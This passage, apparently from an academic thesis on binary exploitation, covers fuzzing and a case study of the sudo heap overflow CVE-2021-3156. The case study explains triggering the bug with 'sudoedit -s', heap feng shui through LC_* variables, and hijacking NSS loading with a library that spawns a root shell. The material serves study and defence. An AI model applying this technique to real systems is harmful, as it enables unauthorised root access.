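FD_OFFSET, BK_OFFSET = 0x8, 0xC   # offsets of fd and bk inside a 32-bit chunk

def unlink(mem, p):
    """Unchecked unlink of chunk p; mem maps word addresses to values."""
    fd = mem[p + FD_OFFSET]
    bk = mem[p + BK_OFFSET]
    mem[fd + BK_OFFSET] = bk      # FD->bk = BK
    mem[bk + FD_OFFSET] = fd      # BK->fd = FD

P = 0x1000                        # placeholder address of the controlled chunk
mem = {P + FD_OFFSET: 0x5655D804, P + BK_OFFSET: 0x5508F311}
unlink(mem, P)
```

The first write is the useful one for an attacker; the second is a side effect, so the value stored in bk must itself point to writable memory.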
Chapter 6
Fuzzing
6.1 Introduction
Software has bugs. This whole text depends on it. But finding bugs may not be as trivial
as it seems. Software can be complex, and remembering all the corner cases for all the lines
of code, taking into account how they interact with each other, is unrealistic. By human
mistake or lack of knowledge, programmers can introduce bugs in their software, sometimes
very hard to reproduce or with very particular triggers.
Fuzzing means using automatically generated tests to perform software testing[34]. Fuzzing
searches the input space of a program by brute force, looking for faulty
inputs that may cause misbehavior by the software. This technique has been very successful
at finding security bugs in software in the last decade and has gained a lot of popularity.
It is, in fact, a critical component of software testing even for production environments.
6.2 Code coverage

Code coverage is a metric which measures how much of the program has been executed. This
metric helps to know how complete a test has been. By using code coverage we can quantify
the usefulness of the input cases generated by the fuzzer and optimize the fuzzing session.
Coverage can be defined on different criteria:
Functions executed.
Statements executed.
Edges taken.
Branches taken.
Conditions resolved.
6.3 Types of fuzzers

Fuzzers are typically classified along 3 dimensions.
6.3.1 Input seed

Generative
The fuzzer generates the input from scratch, usually by random methods. The advantages of
this technique are that it is easy to implement, does not require a corpus of examples and
can generate a broad spectrum of input cases. The disadvantage is that it generates
a lot of uninteresting inputs. Because of its simplicity it only uncovers shallow bugs in
non-trivial programs, and it takes a lot of time and effort to generate input cases that go
deep into the program execution tree.
Mutations
Most randomly generated inputs are not syntactically valid and do not go far
along a program path. Mutation-based fuzzers apply certain transformations (mutations) to
already existing examples of input to produce new input, thus they require a corpus. These
mutations usually retain the structure of the input, if there is one. Because of the similarity
between the generated input and the corpus examples the fuzzer can focus on interesting
cases that go deep into the program execution tree, but it is not as exhaustive as the
generative method. Some common mutations include:
Bit flips
Arithmetic
Removing/Adding bytes
Swapping bytes
Repeating bytes
Inserting UTF characters into ASCII strings
Removing/Adding new lines, null terminators, EOFs, ...
Replacing numbers with known problematic ones, e.g. negatives, big integers, floats, ...
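A few of the mutations listed above can be sketched as small functions over byte strings. The function names and the MUTATIONS list are hypothetical and do not come from any particular fuzzer; each function assumes a non-empty input and takes a random.Random instance so that runs can be reproduced.

```python
import random

def bit_flip(data, rng):
    """Flip a single randomly chosen bit."""
    out = bytearray(data)
    pos = rng.randrange(len(out) * 8)
    out[pos // 8] ^= 1 << (pos % 8)
    return bytes(out)

def swap_bytes(data, rng):
    """Swap two randomly chosen positions (possibly the same one)."""
    out = bytearray(data)
    i, j = rng.randrange(len(out)), rng.randrange(len(out))
    out[i], out[j] = out[j], out[i]
    return bytes(out)

def insert_byte(data, rng):
    """Insert one random byte at a random position."""
    pos = rng.randrange(len(data) + 1)
    return data[:pos] + bytes([rng.randrange(256)]) + data[pos:]

def remove_byte(data, rng):
    """Remove one byte at a random position."""
    pos = rng.randrange(len(data))
    return data[:pos] + data[pos + 1:]

MUTATIONS = [bit_flip, swap_bytes, insert_byte, remove_byte]

def mutate(data, rng):
    """Apply one randomly chosen mutation."""
    return rng.choice(MUTATIONS)(data, rng)
```

A typical use is mutate(seed, random.Random(0)), repeated many times over the corpus.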
6.3.2 Input structure

Unstructured
The fuzzer does not know the structure of the input. It requires less setup for fuzzing and
can be employed on a wide variety of programs. This technique is more exhaustive than
structured fuzzing but can generate a lot of uninteresting input cases for programs that
expect structured data, which means wasting CPU cycles. It also takes longer to explore the
program execution tree.
Structured
The format of the input is specified to the fuzzer. Then the fuzzer can generate new inputs
from this specification. It is especially useful for fuzzing highly structured data like
protocols, file formats or sequences of mouse clicks or keyboard events. The goal of structured
input is to reduce the number of trivial inputs that are going to be rejected quickly by
the target program, achieving a deeper exploration of the program execution tree than
unstructured input. Generally, the input format is specified as a formal grammar.
6.3.3 Program knowledge

Blackbox
The fuzzer is not allowed to scan or analyze the internal parts of the program. The
executable is treated as a black box that receives input and prints output. The fuzzer generates
inputs for the target program without knowledge of its internal behavior or implementation.
Because this technique does not modify the source code, does not inject instrumentation
and does not analyze test coverage after each execution, there are no overheads at runtime,
making it suitable for large or slow binaries. It does not need access to the source code.
Whitebox
The fuzzer is allowed to analyze the whole program. The goal is to track and maximize
code coverage. This is done by adding instrumentation to the original source code, which
requires recompilation. This instrumentation is just a logger that registers when a checkpoint
is reached along the execution path of a program. Target checkpoints are usually function
prologues and epilogues, jumps and conditional statements.
Thanks to all this structural analysis of the program the fuzzer can triage inputs depending
on how much code coverage they contribute, whether new paths have been discovered, or which
types of input flow through one path or another. This makes this technique the most
effective at finding deeply hidden bugs. The downside is the overhead of the instrumentation
and that for every execution, the output feedback must be analyzed by the fuzzer to continue
generating input. In addition, one does not always have access to the source code or cannot
compile the program.
Greybox
Greybox fuzzing tries to maintain the benefits of whitebox fuzzing while minimizing its
downsides. It also uses instrumentation, but much lighter, instrumenting certain files or
instructions and without analyzing the whole program. This technique is the most popular
of the three, as the top 3 fuzzers AFL, Honggfuzz and libFuzzer use the greybox technique.
Chapter 7
Practical case
7.1 CVE-2021-3156
On 2021-01-26, the Qualys Research Team disclosed a vulnerability in the sudo command
that allowed privilege escalation via a heap overflow[25].
The sudo program is a utility for UNIX systems that allows a user to run programs with the
privileges of another user. It comes installed by default in almost all Linux distributions.
The affected versions go from 1.8.2 to 1.8.31p2 for legacy versions and from 1.9.0 to 1.9.5p1
for stable versions. Exploits have been tested on Ubuntu 20.04, Debian 10, Fedora 33 and
macOS Big Sur.
7.1.1 Weakness
The weakness exploited is an off-by-one error (CWE-193). That means that the range of
a loop is wrongly calculated, so the loop performs more iterations than intended.
Listing 7.1: Example of off-by-one
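char data[] = {0x41, 0x41, 0x41, 0x41, '\\', 0x0, 0x41, 0x41, 0x0};
char *from = data;
/* strlen stops at the first null byte, so only 6 bytes are allocated */
char *to = malloc(strlen(from) + 1);

while (*from)
{
    if (from[0] == '\\')
        from++;         /* skip the backslash, landing on the null byte */
    *to++ = *from++;    /* copy the null byte and step past it */
}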
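The effect of the loop in Listing 7.1 can be measured without corrupting any memory by counting the bytes it would store instead of storing them. The sketch below is an illustration only: bytes_allocated, bytes_written and sample are hypothetical names, and the check_terminator flag shows one possible bounded variant of the loop, which is an assumption made here and not necessarily the upstream fix.

```c
#include <stddef.h>
#include <string.h>

/* Bytes the allocation in the listing reserves: strlen stops at the first null byte. */
size_t bytes_allocated(const char *from)
{
    return strlen(from) + 1;
}

/*
 * Bytes the copy loop would write, counted without touching a destination.
 * With check_terminator set, a backslash is only skipped when it is not the
 * last character before the null byte.
 */
size_t bytes_written(const char *from, int check_terminator)
{
    size_t written = 0;

    while (*from) {
        if (from[0] == '\\' && (!check_terminator || from[1] != '\0'))
            from++;         /* skip the backslash */
        from++;             /* the byte that *to++ = *from++ would store */
        written++;
    }
    return written;
}

/* The bytes from the listing: "AAAA\", a null byte, then "AA" and a final null byte. */
const char sample[] = {0x41, 0x41, 0x41, 0x41, '\\', 0x0, 0x41, 0x41, 0x0};
```

For the sample data, the allocation reserves 6 bytes while the unchecked loop stores 7; with the extra terminator check the loop stops at the first null byte and stores 5.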
7.1.2 Bug
Vulnerability identification
In set_cmnd() a heap overflow can happen if a command line argument ends with a
backslash. A buffer is allocated on the heap to store the user-provided arguments. To
compute the length of the buffer, the code iterates over argv and calls strlen, which stops
at the null termination byte. By changing the arguments provided to sudo we can control
the size of the heap-allocated buffer.
Listing 7.2: sudoers.c:set_cmnd

size_t size, n;

/* Alloc and build up user_args. */
for (size = 0, av = NewArgv + 1; *av; av++)
    size += strlen(*av) + 1;

if (size == 0 || (user_args = malloc(size)) == NULL) {
    sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));
    debug_return_int(-1);
}
Later, the program copies the argv values into the newly allocated buffer. But the copying
code hides an off-by-one bug. By providing a backslash at the end of an argument we can
make the from pointer advance two positions in one iteration, jumping over the null byte
that would stop the copy.
Listing 7.3: sudoers.c:set_cmnd

if (sudo_mode & (MODE_RUN | MODE_EDIT | MODE_CHECK)) {
    /* ... */
    if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) {
        for (to = user_args, av = NewArgv + 1; (from = *av); av++) {
            while (*from) {
                if (from[0] == '\\' && !isspace((unsigned char)from[1]))
                    from++;
                *to++ = *from++;
            }
            *to++ = ' ';
        }
        /* ... */
    }
    /* ... */
}
[Figure: argument bytes in memory: AAAAAAAA | \ | 0x0 | more data]
Figure 7.1: Out-of-bounds access
1. While *from is different from 0x0, keep looping.
(a) from[0] points to the backslash and from[1] points to the null termination byte.
i. from gets incremented and now points to the null termination byte, skipping
over the backslash.
(b) The null byte is copied into the buffer and from gets incremented. Now from
points to the data after the null byte.
This way, the while loop copies more data than was previously calculated, writing outside
of the heap-allocated buffer and overwriting critical data in the adjacent heap chunks.
Reaching the vulnerable code

sudo works by setting a mode of operation based on how the user invoked the command.
Different modes of operation execute different parts of the code. To reach the vulnerable
code, the sudo mode must satisfy the following condition.
MODE_SHELL ∧ (MODE_EDIT ∨ MODE_CHECK) ∧ ¬MODE_RUN
MODE_RUN must be turned off because it triggers code that escapes special characters in
the command line arguments, which would prevent us from triggering the bug.
If MODE_EDIT or MODE_CHECK is set manually via the command line options -e and -l, a
check in parse_args() turns off MODE_SHELL. But calling sudoedit instead of sudo
automatically sets MODE_EDIT without unsetting MODE_SHELL.
MODE_SHELL can be set via command line option -s.

Therefore, by calling sudoedit -s we can reach the vulnerable code.
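The mode condition above can be written as a small predicate over bit flags. This is only a sketch: the bit values below are placeholders chosen for illustration (the real ones are defined in sudo's headers), and reaches_vulnerable_copy is a hypothetical name.

```c
#include <stdbool.h>

/* Placeholder bit values for illustration; the real ones live in sudo's headers. */
enum {
    MODE_RUN   = 1 << 0,
    MODE_EDIT  = 1 << 1,
    MODE_CHECK = 1 << 2,
    MODE_SHELL = 1 << 3
};

/* MODE_SHELL and (MODE_EDIT or MODE_CHECK) and not MODE_RUN */
bool reaches_vulnerable_copy(int sudo_mode)
{
    bool shell = (sudo_mode & MODE_SHELL) != 0;
    bool edit_or_check = (sudo_mode & (MODE_EDIT | MODE_CHECK)) != 0;
    bool run = (sudo_mode & MODE_RUN) != 0;

    return shell && edit_or_check && !run;
}
```

Under these assumptions, the combination produced by sudoedit -s (MODE_EDIT together with MODE_SHELL) satisfies the predicate, while a plain sudo -s (MODE_RUN together with MODE_SHELL) does not.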
Figure 7.2: Unpatched sudo behaviour
Figure 7.3: Patched sudo behaviour
7.1.3 Exploitation
Overflowing with data
Once we know we can overflow the heap buffer, we need targets. In their report, the Qualys
team first tried to abuse locale-related settings to turn the buffer overflow into a format
string vulnerability. In the process they implemented a fuzzer to play around with the LC_*
environment variables. The initial plan ultimately failed, but the fuzzer produced dozens of
unique crashes, three of which they exploited.
Here I am going to discuss an implementation of the second case they presented: overwriting
the name of a library loaded at runtime.
Figure 7.4: Relevant calls in sudo
Name Service Switch

NSS is a name resolution mechanism for UNIX-like systems. It is based on a group of
databases that contain information about certain names.
Sudo uses this mechanism to check for permissions.
Listing 7.4: sudoers.c
cmnd_status = set_cmnd();
/* ... */
validated = sudoers_lookup(snl, sudo_user.pw, FLAG_NO_USER | FLAG_NO_HOST,
    pwflag);
Then sudoers_lookup starts a chain of calls that arrives at __nss_lookup_function.

__nss_lookup_function calls nss_load_library, which loads a library specified by name
as if it were a dynamically linked library, using __libc_dlopen. Because all these
structures are allocated on the heap, we can load an attacker-controlled library by
overwriting the name field of a service with the heap overflow in set_cmnd.
Figure 7.5: NSS data structures
In this case, sudo will try to load the service files from the database group. If we overwrite
the name field of the service structure we control which library sudo is going to load.
To make sure we do not overwrite anything that could cause a segmentation fault before
nss_load_library is called, we need to allocate the user input buffer close to the chunk
where this data structure is allocated. To ensure we get the chunk we want, we need to
employ a special technique: heap feng shui.
typedef struct service_user
{
    /* And the link to the next entry. */
    struct service_user *next;
    /* Action according to result. */
    lookup_actions actions[5];
    /* Link to the underlying library object. */
    service_library *library;
    /* Collection of known functions. */
    void *known;
    /* Name of the service (`files', `dns', `nis', ...). */
    char name[0];
} service_user;
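To see why controlling the name field is enough, it helps to look at how the file name of the library is derived from it. The sketch below is a simplification under stated assumptions: it assumes the "libnss_" prefix and the ".so.2" suffix that glibc uses on Linux, and nss_library_name is a hypothetical helper, not a glibc function.

```c
#include <stddef.h>
#include <string.h>

/* Builds "libnss_<name>.so.2" into out; returns 0 on success, -1 if it does not fit. */
int nss_library_name(const char *service_name, char *out, size_t out_size)
{
    static const char prefix[] = "libnss_";
    static const char suffix[] = ".so.2";   /* assumed revision suffix */
    size_t name_len = strlen(service_name);
    size_t total = (sizeof(prefix) - 1) + name_len + (sizeof(suffix) - 1);

    if (total + 1 > out_size)
        return -1;
    memcpy(out, prefix, sizeof(prefix) - 1);
    memcpy(out + sizeof(prefix) - 1, service_name, name_len);
    /* sizeof(suffix) includes the terminating null byte */
    memcpy(out + sizeof(prefix) - 1 + name_len, suffix, sizeof(suffix));
    return 0;
}
```

With the legitimate name "files" this yields libnss_files.so.2. A name containing a slash, such as "X/X", yields libnss_X/X.so.2, which is a relative path rather than a bare library name.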
Heap feng shui

This technique aims to modify and influence the heap layout. Thanks to the defragmentation
routines of the allocator's implementation and certain tables for reusing previously allocated
chunks, the heap layout is very dynamic. By allocating chunks of certain sizes and freeing
them, we can force later allocations to reuse the previous chunks instead of creating new
ones, and vice versa. We just need to find the correct sizes to enforce a certain layout,
one that is favorable to the attacker. The goal for this exploit is to place a specific chunk
first in one of the tcache's lists: the chunk located immediately before the chunk where the
group:files NSS service is allocated. This layout must be in place right before the
allocation of user_args in set_cmnd. We can then claim this chunk with a user input of
the size served by the tcache list where it is located.
[Figure: the tcache lists (0x20, 0x30, 0x40, 0x50, ...). The 0x50 list points to the freed
chunk at 0x55aabb, which sits right before the group:files service chunk. After
user_args = malloc(0x50); /* return chunk from tcache */ the chunk at 0x55aabb holds
user_args.]
Figure 7.6: Intended heap layout
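Choosing an input size that lands in a given tcache list requires knowing how a request is rounded to a chunk size. The following sketch assumes 64-bit glibc (8-byte size field, 16-byte alignment, 32-byte minimum chunk); chunk_size and tcache_index are hypothetical helper names that mirror the allocator's arithmetic, not glibc functions.

```c
#include <stddef.h>

#define SIZE_SZ          8u    /* size of the chunk size field on 64-bit */
#define MALLOC_ALIGNMENT 16u
#define MIN_CHUNK_SIZE   32u

/* Chunk size used for a malloc(request), under the assumptions above. */
size_t chunk_size(size_t request)
{
    size_t size = (request + SIZE_SZ + MALLOC_ALIGNMENT - 1)
                  & ~(size_t)(MALLOC_ALIGNMENT - 1);
    return size < MIN_CHUNK_SIZE ? MIN_CHUNK_SIZE : size;
}

/* Index of the tcache list serving chunks of this size (0 -> 0x20, 1 -> 0x30, ...). */
size_t tcache_index(size_t chunk)
{
    return (chunk - MIN_CHUNK_SIZE) / MALLOC_ALIGNMENT;
}
```

Under these assumptions, requests between 0x39 and 0x48 bytes are served from the 0x50 list, so the total length of the arguments (each strlen plus one) has to fall in that range to claim a chunk from it.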
Now, we need to find some code that we can control to make all the allocations and frees
needed to shake the heap around. setlocale is a function used to set locale and language
related settings for ease of translation at runtime. It turns out that setlocale performs
quite a lot of mallocs and frees with environment variables used for locale settings:
LC_CTYPE, LC_TIME, LC_MONETARY, just to name a few. Because they are environment variables
we can control their size and their contents, just what we need to implement the heap feng
shui technique.
I wrote a bruteforcer that plays around with the values of the LC_* variables and observes
the state of the heap and the tcache. If the tcache holds a chunk ready to be allocated that
lies right before the chunk where group:files is allocated, a solution has been found.
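One building block of such a bruteforcer is a helper that produces an LC_* entry of a chosen length. The sketch below is an assumption about how candidates could be generated, not the code used in this work: the base locale "C.UTF-8@" followed by padding is an illustrative choice, and make_locale_entry is a hypothetical name.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Returns a heap string "NAME=C.UTF-8@AAAA..." with pad_len 'A' bytes; caller frees it. */
char *make_locale_entry(const char *name, size_t pad_len)
{
    static const char locale[] = "=C.UTF-8@";   /* assumed base locale */
    size_t name_len = strlen(name);
    size_t total = name_len + (sizeof(locale) - 1) + pad_len;
    char *entry = malloc(total + 1);

    if (entry == NULL)
        return NULL;
    memcpy(entry, name, name_len);
    memcpy(entry + name_len, locale, sizeof(locale) - 1);
    memset(entry + name_len + sizeof(locale) - 1, 'A', pad_len);
    entry[total] = '\0';
    return entry;
}
```

A search loop would vary pad_len for each variable, run the target with the resulting environment, and inspect the heap state after each run.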
Figure 7.7: Printing the heap layout while bruteforcing
Overwriting with environment variables

Now that we have our desired chunk, we just need to overflow it with data. Because we
already used the user input to set the size of the chunk we wanted from the tcache, we need
to find another way in for the extra data. Revisiting set_cmnd, on the lines where the
overflow happens, and taking a look at the variable from, we can see that it is a pointer
into the stack, where the C runtime environment puts the arguments supplied to the command.
Further down the stack (towards the higher addresses) the C runtime also puts the
environment variables, adjacent to the arguments.
This means that, once it skips the null byte, the from variable will point to the
environment variables. That is where we want to put the payload for the overflow.
[Figure: the environment variables are copied into the user_args chunk at 0x55aabb and
overflow into the adjacent group:files service chunk.]
Figure 7.8: Overflow
First we need some padding to compensate for the offset between where the chunk starts and
where its actual data starts. Then we can set the new contents for the group:files
service. Lastly, we put the LC_* variables that the bruteforcer found as a solution.
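The way the copy loop runs from the last argument into the environment can be simulated safely on a single contiguous block of bytes. This is a sketch under stated assumptions: the block stands in for the stack region holding the argument and environment strings, the out buffer stands in for the heap chunk and is deliberately oversized, and simulate_set_cmnd and copy_result are hypothetical names.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

struct copy_result {
    size_t allocated;   /* what the size loop in set_cmnd would request */
    size_t written;     /* what the copy loop actually stores */
};

/*
 * argv_strings: NULL-terminated pointers into one contiguous block, mimicking
 * arguments that sit right before the environment strings.
 * out must be large enough for the simulation.
 */
struct copy_result simulate_set_cmnd(char *const argv_strings[], char *out)
{
    struct copy_result r = {0, 0};
    char *to = out;

    for (char *const *av = argv_strings; *av; av++)
        r.allocated += strlen(*av) + 1;

    for (char *const *av = argv_strings; *av; av++) {
        const char *from = *av;
        while (*from) {
            if (from[0] == '\\' && !isspace((unsigned char)from[1]))
                from++;             /* may step onto the terminator */
            *to++ = *from++;        /* may copy it and walk into the next string */
        }
        *to++ = ' ';
    }
    r.written = (size_t)(to - out);
    return r;
}
```

For a block holding the argument AAAA\ immediately followed by the string PAYLOAD, the size loop requests 6 bytes while the copy loop stores 13: the four As, a null byte, PAYLOAD and the trailing space.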
Evil library
For the hijacked library, we are going to build a dynamically linked library that calls
execve("/bin/sh") in its constructor. When the library gets loaded, the constructor
function starts executing automatically and opens a root shell for us. It is important
for the library to be located in the directory from which the exploit is executed, inside
a folder called libnss_${name}, where name is the name of the library.
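The mechanism that makes this work is the constructor attribute, a GCC and Clang extension that runs a function as soon as the object is loaded. The sketch below is a harmless stand-in that only sets a flag where the library described above would call execve; constructor_ran and on_load are hypothetical names.

```c
/* Set by the constructor so that the effect of loading can be observed. */
int constructor_ran = 0;

/* Runs automatically when the object is loaded: before main() for an
 * executable, or during dlopen() for a shared library. */
__attribute__((constructor))
static void on_load(void)
{
    constructor_ran = 1;    /* placeholder for the real payload */
}
```

Built as a shared object (for example with gcc -shared -fPIC), the function runs inside whatever process loads the library, with that process's privileges, without the process ever calling it explicitly.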
Figure 7.9: Successful exploit

Appendix A
CVEs and CWEs
A.1 CVE Program

The Common Vulnerabilities and Exposures program is a system to identify and classify
publicly disclosed cybersecurity vulnerabilities. It is a database holding records for each
vulnerability identified and disclosed by researchers and organizations. CVE records are
used to ensure common definitions for issues.
A.1.1 CVE IDs

A CVE ID is the unique identifier used to refer to a vulnerability in the CVE database. The
identifier consists of the CVE prefix, followed by the year of registration, followed by
arbitrary digits. For example, the CVE ID of the vulnerability shown in Section 7.1,
nicknamed "Baron Samedit" by its authors at Qualys, is CVE-2021-3156, 2021 being the
year of registration.
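The format can be checked mechanically. The sketch below assumes the CVE Program's syntax of a four-digit year followed by a sequence number of four or more digits; is_cve_id is a hypothetical helper name.

```c
#include <ctype.h>
#include <stdbool.h>
#include <string.h>

/* Accepts "CVE-YYYY-NNNN" where the sequence part has four or more digits. */
bool is_cve_id(const char *s)
{
    size_t i;

    if (strncmp(s, "CVE-", 4) != 0)
        return false;
    s += 4;
    for (i = 0; i < 4; i++)             /* year of registration */
        if (!isdigit((unsigned char)s[i]))
            return false;
    if (s[4] != '-')
        return false;
    s += 5;
    for (i = 0; isdigit((unsigned char)s[i]); i++)
        ;                               /* count the sequence digits */
    return i >= 4 && s[i] == '\0';
}
```

With this check, CVE-2021-3156 is accepted, while strings with a shortened year or fewer than four sequence digits are rejected.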
A.1.2 CNAs
CVEs are assigned by CVE Numbering Authorities (CNAs), which are organizations formally
partnered with the CVE Program. When a researcher or organization finds a vulnerability,
they request a CNA to assign a CVE ID to it. The CNA registers it in the CVE database as
a record only if the vendor or owner of the software allows the vulnerability to be
publicly disclosed.
A.2 CWE Program

The Common Weakness Enumeration is a public database of common software and hardware
weakness types that could lead to security issues. The goal is to educate software and
hardware engineers on how to stop vulnerabilities at the source by identifying and classifying
these weaknesses in a taxonomy. The records of the database also contain examples, related
weaknesses, consequences and mitigations, among other things, to help users prevent
vulnerabilities.
List of Figures
1.1 Simplified stack timeline
1.2 Standard C 32-bit calling convention stack layout
1.3 Buffer on the stack
1.4 Stack4@Phoenix
1.5 man 3 gets: Bugs section
1.6 Exploiting Stack4
1.7 Stack offsets between debugged process and non debugged process
2.1 Stack canary
2.2 foo function without and with stack canary
2.3 man gcc
2.4 libc base address loaded at runtime with ASLR enabled/disabled
3.1 Format function stack frame
3.2 Format string vulnerability
3.3 Anatomy of an arbitrary read format string exploit
3.4 Address of s3cr3t on the input buffer
3.5 Value of s3cr3t leaked
3.6 Compiled with stack canaries
3.7 win() function executed.
4.1 ret2libc stack layout
4.2 libc base address
4.3 system offset from libc base address
4.4 "/bin/sh" string offset from libc base address
4.5 ret2libc exploit
4.6 ROP chain
4.7 ROP gadget pop rdi; ret
4.8 NOP gadget
4.9 Stack layout for example
4.10 libc base address at runtime
4.11 system offset from libc base address
4.12 "/bin/sh" offset from libc base address
4.13 Successful exploitation of the rop chain
4.14 Stack layout for a stack pivoting attack
4.15 leave gadget
4.16 Stack pivoting example: instruction sequence
4.17 esp points to buffer
4.18 Successful exploitation
4.19 __dl_runtime_resolve execution path
4.20 Addresses of the most important tables for the exploit
4.21 .data and .bss segments of the process
4.22 Mapped segments of the process
4.23 Offsets from the tables to the second buffer
4.24 Bytes of the exploit
4.25 Successful exploitation of a ret2dlresolve attack
4.26 Layout of a SROP exploit in Linux x86_64[5]
4.27 SROP gadgets
4.28 SROP payload
4.29 Successful exploitation of an SROP exploit
5.1 Allocated chunk structure
5.2 Freed chunk structure
5.3 Tcache structure
5.4 Heap overflow
5.5 heap-one@phoenix
5.6 heap-one solved
5.7 heap-two@Phoenix
5.8 Double free vulnerability
5.9 User controlled chunk
7.1 Out-of-bounds access
7.2 Unpatched sudo behaviour
7.3 Patched sudo behaviour
7.4 Relevant calls in sudo
7.5 NSS data structures
7.6 Intended heap layout
7.7 Printing the heap layout while bruteforcing
7.8 Overflow
7.9 Successful exploit
List of Tables
3.1 Common format conversion specifiers table
Bibliography
[1] Aleph1. Smashing The Stack For Fun And Profit. url: http://phrack.org/issues/49/14.html. (accessed: 10/4/2021).
[2] Anonymous. Once upon a free. url: http://phrack.org/issues/57/9.html. (accessed: 3/5/2021).
[3] Code Arcana. Introduction to format string exploits. url: https://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html. (accessed: 28/3/2021).
[4] Atum. Intro to Windows Exploit Techniques for Linux PWNers. url: https://blog.pwnhub.cn/download/01/WinPWN.pdf. (accessed: 11/5/2021).
[5] Erik Bosman and Herbert Bos. Signal-return oriented programming. url: https://www.cs.vu.nl/~herbertb/papers/srop_sp14.pdf. (accessed: 8/5/2021).
[6] Intel Corporation. Intel 64 and IA-32 Architectures Software Developer's Manual Volume 1: Basic Architecture. Intel Corporation, 2020.
[7] D3v17. Ret2dl_resolve x64. url: https://syst3mfailure.io/ret2dl_resolve. (accessed: 31/05/2021).
[8] Robin David. checksec. url: https://github.com/RobinDavid/checksec/blob/master/checksec.sh. (accessed: 24/3/2021).
[9] Peter Van Eeckhoutte. Exploit writing tutorial part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR. url: https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/. (accessed: 6/4/2021).
[10] Patrice Godefroid. A brief introduction to fuzzing and why it's an important tool for developers. url: https://www.microsoft.com/en-us/research/blog/a-brief-introduction-to-fuzzing-and-why-its-an-important-tool-for-developers/. (accessed: 31/05/2021).
[11] Google. AFL (american fuzzy lop). url: https://afl-1.readthedocs.io/en/latest/index.html. (accessed: 17/3/2021).
[12] Google. Coverage guided vs blackbox fuzzing. url: https://google.github.io/clusterfuzz/reference/coverage-guided-vs-blackbox/. (accessed: 2/6/2021).
[13] ir0nstone. Binary exploitation notes. url: https://ir0nstone.gitbook.io/notes/. (accessed: 31/3/2021).
[14] Réka Kovács. Structure-aware fuzzing. url: https://meetingcpp.com/mcpp/slides/2018/Structured%20fuzzing.pdf. (accessed: 2/06/2021).
[15] OSIRIS Lab. Stack canaries. url: https://ctf101.org/binary-exploitation/stack-canaries. (accessed: 6/3/2021).
[16] MallocInternals. url: https://sourceware.org/glibc/wiki/MallocInternals. (accessed: 2/4/2021).
[17] Dr. Hector Marco-Gisbert and Dr. Ismael Ripoll-Ripoll. return-to-csu: A New Method to Bypass 64-bit Linux ASLR. url: https://i.blackhat.com/briefings/asia/2018/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR-wp.pdf. (accessed: 9/5/2021).
[18] MaXX. Vudo malloc tricks. url: http://phrack.org/issues/57/8.html#article. (accessed: 10/4/2021).
[19] Mitre. CVE-2021-3156. url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3156. (accessed: 12/05/2021).
[20] Mitre. CWE-193: Off-by-one Error. url: https://cwe.mitre.org/data/definitions/193.html. (accessed: 12/05/2021).
[21] Nergal. Advanced return-into-lib(c) exploits [PaX case study]. url: http://phrack.org/issues/58/4.html. (accessed: 9/5/2021).
[22] NIST. CVE-2021-3156 Detail. url: https://nvd.nist.gov/vuln/detail/CVE-2021-3156. (accessed: 12/05/2021).
[23] osdev.org. Stack smashing protector. url: https://wiki.osdev.org/Stack_Smashing_Protector. (accessed: 6/3/2021).
[24] Phantasmal Phantasmagoria. Malloc Maleficarum. url: https://packetstormsecurity.com/files/40638/MallocMaleficarum.txt.html. (accessed: 3/5/2021).
[25] Qualys. CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit). url: https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-bufferoverflow-in-sudo-baron-samedit. (accessed: 17/3/2021).
[26] Ungureanu Ricardo. 0ctf babystack with return-to dl-resolve. url: https://gist.github.com/ricardo2197/8c7f6f5b8950ed6771c1cd3a116f7e62. (accessed: 9/5/2021).
[27] Ryan Roemer et al. Return-Oriented Programming: Systems, Languages, and Applications. url: https://hovav.net/ucsd/dist/rop.pdf. (accessed: 17/3/2021).
[28] Fundación Sadosky. Guía de exploits. url: https://fundacion-sadosky.github.io/guia-escritura-exploits/format-string/5-format-string.html. (accessed: 24/3/2021).
[29] Sayfer.io. Fuzzing Part 1: The Theory. url: https://sayfer.io/blog/fuzzing-part-1-the-theory/. (accessed: 2/06/2021).
[30] SCUT and TESO Security Group. Exploiting Format String vulnerabilities. url: https://crypto.stanford.edu/cs155old/cs155-spring08/papers/formatstring-1.2.pdf. (accessed: 17/3/2021).
[31] Qualys Research Team. Baron Samedit: Heap-based buffer overflow in Sudo (CVE-2021-3156). url: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt. (accessed: 14/05/2021).
[32] Worawit Wangwarunyoo. Exploit Writeup for CVE-2021-3156 (Sudo Baron Samedit). url: https://datafarm-cybersecurity.medium.com/exploit-writeup-for-cve-2021-3156-sudo-baron-samedit-7a9a4282cb31. (accessed: 14/05/2021).
[33] Jyh-haw Yeh. Format String Vulnerability. url: http://cs.boisestate.edu/~jhyeh/cs546/Format-String-Lecture.pdf. (accessed: 28/3/2021).
[34] Andreas Zeller et al. The Fuzzing Book. In: The Fuzzing Book. Retrieved 2019-09-09 16:42:54+02:00. Saarland University, 2019. url: https://www.fuzzingbook.org/.
[35] Fengwei Zhang. Format-String Vulnerability. url: https://fengweiz.github.io/19fa-cs315/slides/lab10-slides-format-string.pdf. (accessed: 28/3/2021).
